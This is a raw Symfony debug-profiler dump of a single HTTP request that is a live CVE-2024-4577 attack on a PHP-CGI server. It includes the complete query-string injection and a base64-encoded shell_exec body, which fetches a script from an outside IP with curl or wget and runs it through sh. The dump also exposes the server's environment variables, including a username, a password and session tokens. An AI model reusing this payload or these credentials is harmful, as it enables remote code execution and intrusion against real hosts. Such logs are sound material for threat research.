http://35.170.253.210/?%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput

Method
POST
HTTP Status
200
IP
207.180.206.112
Profiled on
Sat, 09 Aug 2025 16:42:22 +0000
Token
d3ee04

GenericController :: indexAction

Request

GET Parameters

Key Value
�d_allow_url_include=1_�d_auto_prepend_file=php://input 
""

POST Parameters

Key Value
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzY2LjYzLjE4Ny4xOTMvc2ggfHwgd2dldCBodHRwOi8vNjYuNjMuMTg3LjE5My9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA 
"")); echo(md5("Hello CVE-2024-4577")); ?>"

Request Attributes

Key Value
_controller 
"AppBundle\Controller\GenericController::indexAction"
_firewall_context 
"security.firewall.map.context.main"
_route 
"index"
_route_params 
[]

Request Headers

Header Value
accept 
"*/*"
connection 
"keep-alive"
content-length 
"221"
content-type 
"application/x-www-form-urlencoded"
host 
"35.170.253.210:80"
upgrade-insecure-requests 
"1"
user-agent 
"libredtail-http"
x-php-ob-level 
"2"

Request Content

<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzY2LjYzLjE4Ny4xOTMvc2ggfHwgd2dldCBodHRwOi8vNjYuNjMuMTg3LjE5My9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA=")); echo(md5("Hello CVE-2024-4577")); ?>

Server Parameters

Key Value
AOT_SID 
"AC516554db32ef3f90458324156ba15326"
AOT_TOKEN 
"e32a0fa5410765e1c734e5b90708e5bd"
APPLICATION_ENV 
"development"
APP_ENV 
"dev"
CONTENT_LENGTH 
"221"
CONTENT_TYPE 
"application/x-www-form-urlencoded"
CONTEXT_DOCUMENT_ROOT 
"/var/www/apic/web"
CONTEXT_PREFIX 
""
DOCUMENT_ROOT 
"/var/www/apic/web"
GATEWAY_INTERFACE 
"CGI/1.1"
HTTP_ACCEPT 
"*/*"
HTTP_CONNECTION 
"keep-alive"
HTTP_HOST 
"35.170.253.210:80"
HTTP_UPGRADE_INSECURE_REQUESTS 
"1"
HTTP_USER_AGENT 
"libredtail-http"
NAME 
"support"
PASS 
"mermaid"
PATH 
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PHP_SELF 
"/app_dev.php"
PORT 
"3306"
QUERY_STRING 
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_AOT_SID 
"AC516554db32ef3f90458324156ba15326"
REDIRECT_AOT_TOKEN 
"e32a0fa5410765e1c734e5b90708e5bd"
REDIRECT_APPLICATION_ENV 
"development"
REDIRECT_APP_ENV 
"dev"
REDIRECT_NAME 
"support"
REDIRECT_PASS 
"mermaid"
REDIRECT_PORT 
"3306"
REDIRECT_QUERY_STRING 
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_STATUS 
"200"
REDIRECT_URL 
"/"
REDIRECT_USER 
"root"
REDIRECT_aws_region 
"us-east-1"
REDIRECT_aws_version 
"latest"
REMOTE_ADDR 
"207.180.206.112"
REMOTE_PORT 
"57592"
REQUEST_METHOD 
"POST"
REQUEST_SCHEME 
"http"
REQUEST_TIME 
1754757742
REQUEST_TIME_FLOAT 
1754757742.594
REQUEST_URI 
"/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
SCRIPT_FILENAME 
"/var/www/apic/web/app_dev.php"
SCRIPT_NAME 
"/app_dev.php"
SERVER_ADDR 
"172.31.86.125"
SERVER_ADMIN 
"webmaster@localhost"
SERVER_NAME 
"35.170.253.210"
SERVER_PORT 
"80"
SERVER_PROTOCOL 
"HTTP/1.1"
SERVER_SIGNATURE 
"<address>Apache/2.4.18 (Ubuntu) Server at 35.170.253.210 Port 80</address>\n"
SERVER_SOFTWARE 
"Apache/2.4.18 (Ubuntu)"
USER 
"root"
aws_region 
"us-east-1"
aws_version 
"latest"

Response

Response Headers

Header Value
cache-control 
"no-cache, private"
content-type 
"text/html; charset=UTF-8"
date 
"Sat, 09 Aug 2025 16:42:22 GMT"
x-debug-token 
"d3ee04"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Flashes

Flashes

No flash messages were created.